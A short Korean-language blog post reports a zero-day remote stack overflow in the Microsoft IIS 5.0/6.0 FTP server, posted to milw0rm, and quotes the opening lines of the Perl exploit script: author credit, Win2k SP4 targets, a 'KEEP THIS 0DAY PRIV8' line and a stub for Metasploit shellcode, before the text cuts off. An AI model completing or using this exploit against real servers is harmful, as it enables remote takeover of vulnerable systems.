[태그:] Windows Server

Microsoft IIS 5.0/6.0 FTP Server Remote Stack Overflow Exploit (win2k)

8월 31일자로 milw0rm 사이트에 제로데이가 올라왔습니다. 윈도우 FTP 서버 취약점인데 Remote라 심각성이 클것으로 보이네요. http://www.offensive-security.com/videos/microsoft-ftp-server-remote-exploit/msftp.html # IIS 5.0 FTPd / Remote r00t exploit # Win2k SP4 targets # bug found & exploited by Kingcope, kcope2<at>googlemail.com # Affects IIS6 with stack cookie protection # August 2009 – KEEP THIS 0DAY PRIV8 use IO::Socket; $|=1; #metasploit shellcode, …